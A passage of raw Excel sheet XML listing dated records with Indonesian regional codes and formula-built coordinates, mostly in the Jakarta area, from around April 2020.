        <v>20055</v>
      </c>
      <c r="Y2077" t="str">
        <f t="shared" si="32"/>
        <v>-6.42250,106.73692</v>
      </c>
    </row>
    <row r="2078" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2078">
        <v>184717</v>
      </c>
      <c r="B2078" s="1">
        <v>43939</v>
      </c>
      <c r="C2078">
        <v>0</v>
      </c>
      <c r="D2078" t="s">
        <v>22</v>
      </c>
      <c r="E2078" t="s">
        <v>23</v>
      </c>
      <c r="F2078" t="s">
        <v>6935</v>
      </c>
      <c r="G2078" t="s">
        <v>6936</v>
      </c>
      <c r="H2078" t="s">
        <v>26</v>
      </c>
      <c r="I2078" t="s">
        <v>284</v>
      </c>
      <c r="J2078" t="s">
        <v>2627</v>
      </c>
      <c r="L2078" t="s">
        <v>6937</v>
      </c>
      <c r="M2078">
        <v>3276011002</v>
      </c>
      <c r="N2078">
        <v>3276011</v>
      </c>
      <c r="O2078">
        <v>3276</v>
      </c>
      <c r="P2078">
        <v>32</v>
      </c>
      <c r="Q2078" t="s">
        <v>6641</v>
      </c>
      <c r="R2078" t="s">
        <v>6642</v>
      </c>
      <c r="S2078" t="s">
        <v>185</v>
      </c>
      <c r="T2078" t="s">
        <v>42</v>
      </c>
      <c r="U2078" s="5">
        <v>10673834</v>
      </c>
      <c r="V2078" s="5" t="s">
        <v>16299</v>
      </c>
      <c r="W2078" s="5">
        <v>-641987</v>
      </c>
      <c r="X2078" t="s">
        <v>20056</v>
      </c>
      <c r="Y2078" t="str">
        <f t="shared" si="32"/>
        <v>-6.41987,106.73834</v>
      </c>
    </row>
    <row r="2079" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2079">
        <v>184719</v>
      </c>
      <c r="B2079" s="1">
        <v>43944</v>
      </c>
      <c r="C2079">
        <v>0</v>
      </c>
      <c r="D2079" t="s">
        <v>22</v>
      </c>
      <c r="E2079" t="s">
        <v>23</v>
      </c>
      <c r="F2079" t="s">
        <v>6938</v>
      </c>
      <c r="G2079" t="s">
        <v>6939</v>
      </c>
      <c r="H2079" t="s">
        <v>26</v>
      </c>
      <c r="I2079" t="s">
        <v>908</v>
      </c>
      <c r="J2079" t="s">
        <v>6940</v>
      </c>
      <c r="L2079" t="s">
        <v>6941</v>
      </c>
      <c r="M2079">
        <v>1110101023</v>
      </c>
      <c r="N2079">
        <v>1110101</v>
      </c>
      <c r="O2079">
        <v>1110</v>
      </c>
      <c r="P2079">
        <v>11</v>
      </c>
      <c r="Q2079" t="s">
        <v>6942</v>
      </c>
      <c r="R2079" t="s">
        <v>6943</v>
      </c>
      <c r="S2079" t="s">
        <v>6944</v>
      </c>
      <c r="T2079" t="s">
        <v>6945</v>
      </c>
      <c r="U2079" s="5">
        <v>9684903</v>
      </c>
      <c r="V2079" s="5" t="s">
        <v>16300</v>
      </c>
      <c r="W2079" s="5">
        <v>522695</v>
      </c>
      <c r="X2079" t="s">
        <v>20057</v>
      </c>
      <c r="Y2079" t="str">
        <f t="shared" si="32"/>
        <v>5.22695,96.84903</v>
      </c>
    </row>
    <row r="2080" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2080">
        <v>184720</v>
      </c>
      <c r="B2080" s="1">
        <v>43944</v>
      </c>
      <c r="C2080">
        <v>0</v>
      </c>
      <c r="D2080" t="s">
        <v>22</v>
      </c>
      <c r="E2080" t="s">
        <v>23</v>
      </c>
      <c r="F2080" t="s">
        <v>6946</v>
      </c>
      <c r="G2080" t="s">
        <v>6947</v>
      </c>
      <c r="H2080" t="s">
        <v>26</v>
      </c>
      <c r="I2080" t="s">
        <v>1439</v>
      </c>
      <c r="J2080" t="s">
        <v>6940</v>
      </c>
      <c r="L2080" t="s">
        <v>6948</v>
      </c>
      <c r="M2080">
        <v>1110100076</v>
      </c>
      <c r="N2080">
        <v>1110100</v>
      </c>
      <c r="O2080">
        <v>1110</v>
      </c>
      <c r="P2080">
        <v>11</v>
      </c>
      <c r="Q2080" t="s">
        <v>6949</v>
      </c>
      <c r="R2080" t="s">
        <v>6950</v>
      </c>
      <c r="S2080" t="s">
        <v>6944</v>
      </c>
      <c r="T2080" t="s">
        <v>6945</v>
      </c>
      <c r="U2080" s="5">
        <v>9684568</v>
      </c>
      <c r="V2080" s="5" t="s">
        <v>16301</v>
      </c>
      <c r="W2080" s="5">
        <v>524062</v>
      </c>
      <c r="X2080" t="s">
        <v>20058</v>
      </c>
      <c r="Y2080" t="str">
        <f t="shared" si="32"/>
        <v>5.24062,96.84568</v>
      </c>
    </row>
    <row r="2081" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2081">
        <v>184722</v>
      </c>
      <c r="B2081" s="1">
        <v>43947</v>
      </c>
      <c r="C2081">
        <v>1</v>
      </c>
      <c r="D2081" t="s">
        <v>22</v>
      </c>
      <c r="E2081" t="s">
        <v>23</v>
      </c>
      <c r="F2081" t="s">
        <v>6951</v>
      </c>
      <c r="G2081" t="s">
        <v>6952</v>
      </c>
      <c r="H2081" t="s">
        <v>26</v>
      </c>
      <c r="I2081" t="s">
        <v>65</v>
      </c>
      <c r="J2081" t="s">
        <v>3135</v>
      </c>
      <c r="L2081" t="s">
        <v>6953</v>
      </c>
      <c r="M2081">
        <v>3671012007</v>
      </c>
      <c r="N2081">
        <v>3671012</v>
      </c>
      <c r="O2081">
        <v>3671</v>
      </c>
      <c r="P2081">
        <v>36</v>
      </c>
      <c r="Q2081" t="s">
        <v>6954</v>
      </c>
      <c r="R2081" t="s">
        <v>760</v>
      </c>
      <c r="S2081" t="s">
        <v>201</v>
      </c>
      <c r="T2081" t="s">
        <v>171</v>
      </c>
      <c r="U2081" s="5">
        <v>10670073</v>
      </c>
      <c r="V2081" s="5" t="s">
        <v>16302</v>
      </c>
      <c r="W2081" s="5">
        <v>-620860</v>
      </c>
      <c r="X2081" t="s">
        <v>20059</v>
      </c>
      <c r="Y2081" t="str">
        <f t="shared" si="32"/>
        <v>-6.20860,106.70073</v>
      </c>
    </row>
    <row r="2082" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2082">
        <v>184748</v>
      </c>
      <c r="B2082" s="1">
        <v>43947</v>
      </c>
      <c r="C2082">
        <v>1</v>
      </c>
      <c r="D2082" t="s">
        <v>22</v>
      </c>
      <c r="E2082" t="s">
        <v>23</v>
      </c>
      <c r="F2082" t="s">
        <v>6955</v>
      </c>
      <c r="G2082" t="s">
        <v>6956</v>
      </c>
      <c r="H2082" t="s">
        <v>26</v>
      </c>
      <c r="I2082" t="s">
        <v>137</v>
      </c>
      <c r="J2082" t="s">
        <v>3135</v>
      </c>
      <c r="M2082">
        <v>3674050003</v>
      </c>
      <c r="N2082">
        <v>3674050</v>
      </c>
      <c r="O2082">
        <v>3674</v>
      </c>
      <c r="P2082">
        <v>36</v>
      </c>
      <c r="Q2082" t="s">
        <v>589</v>
      </c>
      <c r="R2082" t="s">
        <v>1043</v>
      </c>
      <c r="S2082" t="s">
        <v>170</v>
      </c>
      <c r="T2082" t="s">
        <v>171</v>
      </c>
      <c r="U2082" s="5">
        <v>10675602</v>
      </c>
      <c r="V2082" s="5" t="s">
        <v>16303</v>
      </c>
      <c r="W2082" s="5">
        <v>-629527</v>
      </c>
      <c r="X2082" t="s">
        <v>20060</v>
      </c>
      <c r="Y2082" t="str">
        <f t="shared" si="32"/>
        <v>-6.29527,106.75602</v>
      </c>
    </row>
    <row r="2083" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2083">
        <v>184750</v>
      </c>
      <c r="B2083" s="1">
        <v>43947</v>
      </c>
      <c r="C2083">
        <v>1</v>
      </c>
      <c r="D2083" t="s">
        <v>2648</v>
      </c>
      <c r="E2083" t="s">
        <v>23</v>
      </c>
      <c r="G2083" t="s">
        <v>6957</v>
      </c>
      <c r="H2083" t="s">
        <v>26</v>
      </c>
      <c r="J2083" t="s">
        <v>530</v>
      </c>
      <c r="L2083" t="s">
        <v>6958</v>
      </c>
      <c r="M2083">
        <v>3174020006</v>
      </c>
      <c r="N2083">
        <v>3174020</v>
      </c>
      <c r="O2083">
        <v>3174</v>
      </c>
      <c r="P2083">
        <v>31</v>
      </c>
      <c r="Q2083" t="s">
        <v>427</v>
      </c>
      <c r="R2083" t="s">
        <v>31</v>
      </c>
      <c r="S2083" t="s">
        <v>32</v>
      </c>
      <c r="T2083" t="s">
        <v>33</v>
      </c>
      <c r="U2083" s="5">
        <v>10675752</v>
      </c>
      <c r="V2083" s="5" t="s">
        <v>16304</v>
      </c>
      <c r="W2083" s="5">
        <v>-618691</v>
      </c>
      <c r="X2083" t="s">
        <v>20061</v>
      </c>
      <c r="Y2083" t="str">
        <f t="shared" si="32"/>
        <v>-6.18691,106.75752</v>
      </c>
    </row>
    <row r="2084" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2084">
        <v>184851</v>
      </c>
      <c r="B2084" s="1">
        <v>43947</v>
      </c>
      <c r="C2084">
        <v>1</v>
      </c>
      <c r="D2084" t="s">
        <v>22</v>
      </c>
      <c r="E2084" t="s">
        <v>23</v>
      </c>
      <c r="F2084" t="s">
        <v>6959</v>
      </c>
      <c r="G2084" t="s">
        <v>6960</v>
      </c>
      <c r="H2084" t="s">
        <v>26</v>
      </c>
      <c r="I2084" t="s">
        <v>1633</v>
      </c>
      <c r="J2084" t="s">
        <v>3135</v>
      </c>
      <c r="L2084" t="s">
        <v>6961</v>
      </c>
      <c r="M2084">
        <v>3671010001</v>
      </c>
      <c r="N2084">
        <v>3671010</v>
      </c>
      <c r="O2084">
        <v>3671</v>
      </c>
      <c r="P2084">
        <v>36</v>
      </c>
      <c r="Q2084" t="s">
        <v>4656</v>
      </c>
      <c r="R2084" t="s">
        <v>200</v>
      </c>
      <c r="S2084" t="s">
        <v>201</v>
      </c>
      <c r="T2084" t="s">
        <v>171</v>
      </c>
      <c r="U2084" s="5">
        <v>10669625</v>
      </c>
      <c r="V2084" s="5" t="s">
        <v>16305</v>
      </c>
      <c r="W2084" s="5">
        <v>-623093</v>
      </c>
      <c r="X2084" t="s">
        <v>20062</v>
      </c>
      <c r="Y2084" t="str">
        <f t="shared" si="32"/>
        <v>-6.23093,106.69625</v>
      </c>
    </row>
    <row r="2085" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2085">
        <v>185098</v>
      </c>
      <c r="B2085" s="1">
        <v>43948</v>
      </c>
      <c r="C2085">
        <v>0</v>
      </c>
      <c r="D2085" t="s">
        <v>2648</v>
      </c>
      <c r="E2085" t="s">
        <v>23</v>
      </c>
      <c r="G2085" t="s">
        <v>6962</v>
      </c>
      <c r="H2085" t="s">
        <v>26</v>
      </c>
      <c r="J2085" t="s">
        <v>6963</v>
      </c>
      <c r="L2085" t="s">
        <v>6964</v>
      </c>
      <c r="M2085">
        <v>3171020007</v>
      </c>
      <c r="N2085">
        <v>3171020</v>
      </c>
      <c r="O2085">
        <v>3171</v>
      </c>
      <c r="P2085">
        <v>31</v>
      </c>
      <c r="Q2085" t="s">
        <v>5778</v>
      </c>
      <c r="R2085" t="s">
        <v>484</v>
      </c>
      <c r="S2085" t="s">
        <v>108</v>
      </c>
      <c r="T2085" t="s">
        <v>33</v>
      </c>
      <c r="U2085" s="5">
        <v>10684673</v>
      </c>
      <c r="V2085" s="5" t="s">
        <v>16306</v>
      </c>
      <c r="W2085" s="5">
        <v>-629162</v>
      </c>
      <c r="X2085" t="s">
        <v>20063</v>
      </c>
      <c r="Y2085" t="str">
        <f t="shared" si="32"/>
        <v>-6.29162,106.84673</v>
      </c>
    </row>
    <row r="2086" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2086">
        <v>185121</v>
      </c>
      <c r="B2086" s="1">
        <v>43948</v>
      </c>
      <c r="C2086">
        <v>0</v>
      </c>
      <c r="D2086" t="s">
        <v>2648</v>
      </c>
      <c r="E2086" t="s">
        <v>23</v>
      </c>
      <c r="G2086" t="s">
        <v>6965</v>
      </c>
      <c r="H2086" t="s">
        <v>26</v>
      </c>
      <c r="J2086" t="s">
        <v>6966</v>
      </c>
      <c r="L2086" t="s">
        <v>6967</v>
      </c>
      <c r="M2086">
        <v>3171030005</v>
      </c>
      <c r="N2086">
        <v>3171030</v>
      </c>
      <c r="O2086">
        <v>3171</v>
      </c>
      <c r="P2086">
        <v>31</v>
      </c>
      <c r="Q2086" t="s">
        <v>5900</v>
      </c>
      <c r="R2086" t="s">
        <v>364</v>
      </c>
      <c r="S2086" t="s">
        <v>108</v>
      </c>
      <c r="T2086" t="s">
        <v>33</v>
      </c>
      <c r="U2086" s="5">
        <v>10679889</v>
      </c>
      <c r="V2086" s="5" t="s">
        <v>16307</v>
      </c>
      <c r="W2086" s="5">
        <v>-627278</v>
      </c>
      <c r="X2086" t="s">
        <v>20064</v>
      </c>
      <c r="Y2086" t="str">
        <f t="shared" si="32"/>
        <v>-6.27278,106.79889</v>
      </c>
    </row>
    <row r="2087" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2087">
        <v>185125</v>
      </c>
      <c r="B2087" s="1">
        <v>43948</v>
      </c>
      <c r="C2087">
        <v>0</v>
      </c>
      <c r="D2087" t="s">
        <v>2648</v>
      </c>
      <c r="E2087" t="s">
        <v>23</v>
      </c>
      <c r="G2087" t="s">
        <v>6968</v>
      </c>
      <c r="H2087" t="s">
        <v>26</v>
      </c>
      <c r="J2087" t="s">
        <v>6969</v>
      </c>
      <c r="L2087" t="s">
        <v>6970</v>
      </c>
      <c r="M2087">
        <v>3171020002</v>
      </c>
      <c r="N2087">
        <v>3171020</v>
      </c>
      <c r="O2087">
        <v>3171</v>
      </c>
      <c r="P2087">
        <v>31</v>
      </c>
      <c r="Q2087" t="s">
        <v>1172</v>
      </c>
      <c r="R2087" t="s">
        <v>484</v>
      </c>
      <c r="S2087" t="s">
        <v>108</v>
      </c>
      <c r="T2087" t="s">
        <v>33</v>
      </c>
      <c r="U2087" s="5">
        <v>10682209</v>
      </c>
      <c r="V2087" s="5" t="s">
        <v>14831</v>
      </c>
      <c r="W2087" s="5">
        <v>-628548</v>
      </c>
      <c r="X2087" t="s">
        <v>20065</v>
      </c>
      <c r="Y2087" t="str">
        <f t="shared" si="32"/>
        <v>-6.28548,106.82209</v>
      </c>
    </row>
    <row r="2088" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2088">
        <v>185140</v>
      </c>
      <c r="B2088" s="1">
        <v>43948</v>
      </c>
      <c r="C2088">
        <v>0</v>
      </c>
      <c r="D2088" t="s">
        <v>2648</v>
      </c>
      <c r="E2088" t="s">
        <v>23</v>
      </c>
      <c r="G2088" t="s">
        <v>6971</v>
      </c>
      <c r="H2088" t="s">
        <v>26</v>
      </c>
      <c r="J2088" t="s">
        <v>6969</v>
      </c>
      <c r="L2088" t="s">
        <v>6972</v>
      </c>
      <c r="M2088">
        <v>3171020002</v>
      </c>
      <c r="N2088">
        <v>3171020</v>
      </c>
      <c r="O2088">
        <v>3171</v>
      </c>
      <c r="P2088">
        <v>31</v>
      </c>
      <c r="Q2088" t="s">
        <v>1172</v>
      </c>
      <c r="R2088" t="s">
        <v>484</v>
      </c>
      <c r="S2088" t="s">
        <v>108</v>
      </c>
      <c r="T2088" t="s">
        <v>33</v>
      </c>
      <c r="U2088" s="5">
        <v>10682194</v>
      </c>
      <c r="V2088" s="5" t="s">
        <v>16308</v>
      </c>
      <c r="W2088" s="5">
        <v>-628519</v>
      </c>
      <c r="X2088" t="s">
        <v>20066</v>
      </c>
      <c r="Y2088" t="str">
        <f t="shared" si="32"/>
        <v>-6.28519,106.82194</v>
      </c>
    </row>
    <row r="2089" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2089">
        <v>185148</v>
      </c>
      <c r="B2089" s="1">
        <v>43948</v>
      </c>
      <c r="C2089">
        <v>0</v>
      </c>
      <c r="D2089" t="s">
        <v>2648</v>
      </c>
      <c r="E2089" t="s">
        <v>23</v>
      </c>
      <c r="G2089" t="s">
        <v>6973</v>
      </c>
      <c r="H2089" t="s">
        <v>26</v>
      </c>
      <c r="J2089" t="s">
        <v>3300</v>
      </c>
      <c r="L2089" t="s">
        <v>6974</v>
      </c>
      <c r="M2089">
        <v>3171020005</v>
      </c>
      <c r="N2089">
        <v>3171020</v>
      </c>
      <c r="O2089">
        <v>3171</v>
      </c>
      <c r="P2089">
        <v>31</v>
      </c>
      <c r="Q2089" t="s">
        <v>483</v>
      </c>
      <c r="R2089" t="s">
        <v>484</v>
      </c>
      <c r="S2089" t="s">
        <v>108</v>
      </c>
      <c r="T2089" t="s">
        <v>33</v>
      </c>
      <c r="U2089" s="5">
        <v>10683363</v>
      </c>
      <c r="V2089" s="5" t="s">
        <v>14829</v>
      </c>
      <c r="W2089" s="5">
        <v>-628911</v>
      </c>
      <c r="X2089" t="s">
        <v>20067</v>
      </c>
      <c r="Y2089" t="str">
        <f t="shared" si="32"/>
        <v>-6.28911,106.83363</v>
      </c>
    </row>
    <row r="2090" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2090">
        <v>185287</v>
      </c>
      <c r="B2090" s="1">
        <v>43948</v>
      </c>
      <c r="C2090">
        <v>0</v>
      </c>
      <c r="D2090" t="s">
        <v>2648</v>
      </c>
      <c r="E2090" t="s">
        <v>23</v>
      </c>
      <c r="G2090" t="s">
        <v>6975</v>
      </c>
      <c r="H2090" t="s">
        <v>26</v>
      </c>
      <c r="J2090" t="s">
        <v>530</v>
      </c>
      <c r="L2090" t="s">
        <v>2716</v>
      </c>
      <c r="M2090">
        <v>3174020006</v>
      </c>
      <c r="N2090">
        <v>3174020</v>
      </c>
      <c r="O2090">
        <v>3174</v>
      </c>
      <c r="P2090">
        <v>31</v>
      </c>
      <c r="Q2090" t="s">
        <v>427</v>
      </c>
      <c r="R2090" t="s">
        <v>31</v>
      </c>
      <c r="S2090" t="s">
        <v>32</v>
      </c>
      <c r="T2090" t="s">
        <v>33</v>
      </c>
      <c r="U2090" s="5">
        <v>10675756</v>
      </c>
      <c r="V2090" s="5" t="s">
        <v>16309</v>
      </c>
      <c r="W2090" s="5">
        <v>-618684</v>
      </c>
      <c r="X2090" t="s">
        <v>20068</v>
      </c>
      <c r="Y2090" t="str">
        <f t="shared" si="32"/>
        <v>-6.18684,106.75756</v>
      </c>
    </row>
    <row r="2091" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2091">
        <v>185579</v>
      </c>
      <c r="B2091" s="1">
        <v>43948</v>
      </c>
      <c r="C2091">
        <v>1</v>
      </c>
      <c r="D2091" t="s">
        <v>2648</v>
      </c>
      <c r="E2091" t="s">
        <v>23</v>
      </c>
      <c r="G2091" t="s">
        <v>6976</v>
      </c>
      <c r="H2091" t="s">
        <v>26</v>
      </c>
      <c r="J2091" t="s">
        <v>1380</v>
      </c>
      <c r="L2091" t="s">
        <v>6977</v>
      </c>
      <c r="M2091">
        <v>3174070002</v>
      </c>
      <c r="N2091">
        <v>3174070</v>
      </c>
      <c r="O2091">
        <v>3174</v>
      </c>
      <c r="P2091">
        <v>31</v>
      </c>
      <c r="Q2091" t="s">
        <v>621</v>
      </c>
      <c r="R2091" t="s">
        <v>84</v>
      </c>
      <c r="S2091" t="s">
        <v>32</v>
      </c>
      <c r="T2091" t="s">
        <v>33</v>
      </c>
      <c r="U2091" s="5">
        <v>10673875</v>
      </c>
      <c r="V2091" s="5" t="s">
        <v>16310</v>
      </c>
      <c r="W2091" s="5">
        <v>-615536</v>
      </c>
      <c r="X2091" t="s">
        <v>20069</v>
      </c>
      <c r="Y2091" t="str">
        <f t="shared" si="32"/>
        <v>-6.15536,106.73875</v>
      </c>
    </row>
    <row r="2092" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2092">
        <v>185619</v>
      </c>
      <c r="B2092" s="1">
        <v>43948</v>
      </c>
      <c r="C2092">
        <v>1</v>
      </c>
      <c r="D2092" t="s">
        <v>85</v>
      </c>
      <c r="E2092" t="s">
        <v>23</v>
      </c>
      <c r="F2092" t="s">
        <v>6978</v>
      </c>
      <c r="G2092" t="s">
        <v>6979</v>
      </c>
      <c r="H2092" t="s">
        <v>26</v>
      </c>
      <c r="J2092" t="s">
        <v>6980</v>
      </c>
      <c r="K2092" t="s">
        <v>6981</v>
      </c>
      <c r="L2092" t="s">
        <v>6982</v>
      </c>
      <c r="M2092">
        <v>3171040002</v>
      </c>
      <c r="N2092">
        <v>3171040</v>
      </c>
      <c r="O2092">
        <v>3171</v>
      </c>
      <c r="P2092">
        <v>31</v>
      </c>
      <c r="Q2092" t="s">
        <v>163</v>
      </c>
      <c r="R2092" t="s">
        <v>163</v>
      </c>
      <c r="S2092" t="s">
        <v>108</v>
      </c>
      <c r="T2092" t="s">
        <v>33</v>
      </c>
      <c r="U2092" s="5">
        <v>10676380</v>
      </c>
      <c r="V2092" s="5" t="s">
        <v>16311</v>
      </c>
      <c r="W2092" s="5">
        <v>-625529</v>
      </c>
      <c r="X2092" t="s">
        <v>20070</v>
      </c>
      <c r="Y2092" t="str">
        <f t="shared" si="32"/>
        <v>-6.25529,106.76380</v>
      </c>
    </row>
    <row r="2093" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2093">
        <v>187363</v>
      </c>
      <c r="B2093" s="1">
        <v>43950</v>
      </c>
      <c r="C2093">
        <v>0</v>
      </c>
      <c r="D2093" t="s">
        <v>22</v>
      </c>
      <c r="E2093" t="s">
        <v>23</v>
      </c>
      <c r="F2093" t="s">
        <v>6983</v>
      </c>
      <c r="G2093" t="s">
        <v>6984</v>
      </c>
      <c r="H2093" t="s">
        <v>26</v>
      </c>
      <c r="I2093" t="s">
        <v>3481</v>
      </c>
      <c r="J2093" t="s">
        <v>6985</v>
      </c>
      <c r="M2093">
        <v>3171080002</v>
      </c>
      <c r="N2093">
        <v>3171080</v>
      </c>
      <c r="O2093">
        <v>3171</v>
      </c>
      <c r="P2093">
        <v>31</v>
      </c>
      <c r="Q2093" t="s">
        <v>6986</v>
      </c>
      <c r="R2093" t="s">
        <v>1403</v>
      </c>
      <c r="S2093" t="s">
        <v>108</v>
      </c>
      <c r="T2093" t="s">
        <v>33</v>
      </c>
      <c r="U2093" s="5">
        <v>10685950</v>
      </c>
      <c r="V2093" s="5" t="s">
        <v>16312</v>
      </c>
      <c r="W2093" s="5">
        <v>-625900</v>
      </c>
      <c r="X2093" t="s">
        <v>20071</v>
      </c>
      <c r="Y2093" t="str">
        <f t="shared" si="32"/>
        <v>-6.25900,106.85950</v>
      </c>
    </row>
    <row r="2094" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2094">
        <v>187364</v>
      </c>
      <c r="B2094" s="1">
        <v>43950</v>
      </c>
      <c r="C2094">
        <v>0</v>
      </c>
      <c r="D2094" t="s">
        <v>2648</v>
      </c>
      <c r="E2094" t="s">
        <v>23</v>
      </c>
      <c r="G2094" t="s">
        <v>6987</v>
      </c>
      <c r="H2094" t="s">
        <v>26</v>
      </c>
      <c r="J2094" t="s">
        <v>6988</v>
      </c>
      <c r="L2094" t="s">
        <v>6989</v>
      </c>
      <c r="M2094">
        <v>3172050006</v>
      </c>
      <c r="N2094">
        <v>3172050</v>
      </c>
      <c r="O2094">
        <v>3172</v>
      </c>
      <c r="P2094">
        <v>31</v>
      </c>
      <c r="Q2094" t="s">
        <v>357</v>
      </c>
      <c r="R2094" t="s">
        <v>358</v>
      </c>
      <c r="S2094" t="s">
        <v>49</v>
      </c>
      <c r="T2094" t="s">
        <v>33</v>
      </c>
      <c r="U2094" s="5">
        <v>10685925</v>
      </c>
      <c r="V2094" s="5" t="s">
        <v>16313</v>
      </c>
      <c r="W2094" s="5">
        <v>-626500</v>
      </c>
      <c r="X2094" t="s">
        <v>20072</v>
      </c>
      <c r="Y2094" t="str">
        <f t="shared" si="32"/>
        <v>-6.26500,106.85925</v>
      </c>
    </row>
    <row r="2095" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2095">
        <v>187366</v>
      </c>
      <c r="B2095" s="1">
        <v>43950</v>
      </c>
      <c r="C2095">
        <v>0</v>
      </c>
      <c r="D2095" t="s">
        <v>2648</v>
      </c>
      <c r="E2095" t="s">
        <v>23</v>
      </c>
      <c r="G2095" t="s">
        <v>6990</v>
      </c>
      <c r="H2095" t="s">
        <v>26</v>
      </c>
      <c r="J2095" t="s">
        <v>6988</v>
      </c>
      <c r="L2095" t="s">
        <v>6991</v>
      </c>
      <c r="M2095">
        <v>3172050006</v>
      </c>
      <c r="N2095">
        <v>3172050</v>
      </c>
      <c r="O2095">
        <v>3172</v>
      </c>
      <c r="P2095">
        <v>31</v>
      </c>
      <c r="Q2095" t="s">
        <v>357</v>
      </c>
      <c r="R2095" t="s">
        <v>358</v>
      </c>
      <c r="S2095" t="s">
        <v>49</v>
      </c>
      <c r="T2095" t="s">
        <v>33</v>
      </c>
      <c r="U2095" s="5">
        <v>10685938</v>
      </c>
      <c r="V2095" s="5" t="s">
        <v>16314</v>
      </c>
      <c r="W2095" s="5">
        <v>-626504</v>
      </c>
      <c r="X2095" t="s">
        <v>20073</v>
      </c>
      <c r="Y2095" t="str">
        <f t="shared" si="32"/>
        <v>-6.26504,106.85938</v>
      </c>
    </row>
    <row r="2096" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2096">
        <v>187373</v>
      </c>
      <c r="B2096" s="1">
        <v>43950</v>
      </c>
      <c r="C2096">
        <v>0</v>
      </c>
      <c r="D2096" t="s">
        <v>2648</v>
      </c>
      <c r="E2096" t="s">
        <v>23</v>
      </c>
      <c r="G2096" t="s">
        <v>6992</v>
      </c>
      <c r="H2096" t="s">
        <v>26</v>
      </c>
      <c r="J2096" t="s">
        <v>6993</v>
      </c>
      <c r="L2096" t="s">
        <v>6994</v>
      </c>
      <c r="M2096">
        <v>3172060005</v>
      </c>
      <c r="N2096">
        <v>3172060</v>
      </c>
      <c r="O2096">
        <v>3172</v>
      </c>
      <c r="P2096">
        <v>31</v>
      </c>
      <c r="Q2096" t="s">
        <v>1019</v>
      </c>
      <c r="R2096" t="s">
        <v>48</v>
      </c>
      <c r="S2096" t="s">
        <v>49</v>
      </c>
      <c r="T2096" t="s">
        <v>33</v>
      </c>
      <c r="U2096" s="5">
        <v>10687618</v>
      </c>
      <c r="V2096" s="5" t="s">
        <v>16315</v>
      </c>
      <c r="W2096" s="5">
        <v>-622004</v>
      </c>
      <c r="X2096" t="s">
        <v>20074</v>
      </c>
      <c r="Y2096" t="str">
        <f t="shared" si="32"/>
        <v>-6.22004,106.87618</v>
      </c>
    </row>
    <row r="2097" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2097">
        <v>187407</v>
      </c>
      <c r="B2097" s="1">
        <v>43950</v>
      </c>
      <c r="C2097">
        <v>0</v>
      </c>
      <c r="D2097" t="s">
        <v>2648</v>
      </c>
      <c r="E2097" t="s">
        <v>23</v>
      </c>
      <c r="G2097" t="s">
        <v>6995</v>
      </c>
      <c r="H2097" t="s">
        <v>26</v>
      </c>
      <c r="J2097" t="s">
        <v>6996</v>
      </c>
      <c r="L2097" t="s">
        <v>6997</v>
      </c>
      <c r="M2097">
        <v>3171080002</v>
      </c>
      <c r="N2097">
        <v>3171080</v>
      </c>
      <c r="O2097">
        <v>3171</v>
      </c>
      <c r="P2097">
        <v>31</v>
      </c>
      <c r="Q2097" t="s">
        <v>6986</v>
      </c>
      <c r="R2097" t="s">
        <v>1403</v>
      </c>
      <c r="S2097" t="s">
        <v>108</v>
      </c>
      <c r="T2097" t="s">
        <v>33</v>
      </c>
      <c r="U2097" s="5">
        <v>10685238</v>
      </c>
      <c r="V2097" s="5" t="s">
        <v>14777</v>
      </c>
      <c r="W2097" s="5">
        <v>-625905</v>
      </c>
      <c r="X2097" t="s">
        <v>20075</v>
      </c>
      <c r="Y2097" t="str">
        <f t="shared" si="32"/>
        <v>-6.25905,106.85238</v>
      </c>
    </row>
    <row r="2098" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2098">
        <v>187413</v>
      </c>
      <c r="B2098" s="1">
        <v>43950</v>
      </c>
      <c r="C2098">
        <v>0</v>
      </c>
      <c r="D2098" t="s">
        <v>22</v>
      </c>
      <c r="E2098" t="s">
        <v>23</v>
      </c>
      <c r="F2098" t="s">
        <v>6998</v>
      </c>
      <c r="G2098" t="s">
        <v>6999</v>
      </c>
      <c r="H2098" t="s">
        <v>26</v>
      </c>
      <c r="I2098" t="s">
        <v>117</v>
      </c>
      <c r="J2098" t="s">
        <v>2485</v>
      </c>
      <c r="L2098" t="s">
        <v>7000</v>
      </c>
      <c r="M2098">
        <v>3171080001</v>
      </c>
      <c r="N2098">
        <v>3171080</v>
      </c>
      <c r="O2098">
        <v>3171</v>
      </c>
      <c r="P2098">
        <v>31</v>
      </c>
      <c r="Q2098" t="s">
        <v>2265</v>
      </c>
      <c r="R2098" t="s">
        <v>1403</v>
      </c>
      <c r="S2098" t="s">
        <v>108</v>
      </c>
      <c r="T2098" t="s">
        <v>33</v>
      </c>
      <c r="U2098" s="5">
        <v>10683098</v>
      </c>
      <c r="V2098" s="5" t="s">
        <v>16316</v>
      </c>
      <c r="W2098" s="5">
        <v>-627389</v>
      </c>
      <c r="X2098" t="s">
        <v>20076</v>
      </c>
      <c r="Y2098" t="str">
        <f t="shared" si="32"/>
        <v>-6.27389,106.83098</v>
      </c>
    </row>
    <row r="2099" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2099">
        <v>187454</v>
      </c>
      <c r="B2099" s="1">
        <v>43950</v>
      </c>
      <c r="C2099">
        <v>0</v>
      </c>
      <c r="D2099" t="s">
        <v>22</v>
      </c>
      <c r="E2099" t="s">
        <v>23</v>
      </c>
      <c r="F2099" t="s">
        <v>7001</v>
      </c>
      <c r="G2099" t="s">
        <v>7002</v>
      </c>
      <c r="H2099" t="s">
        <v>26</v>
      </c>
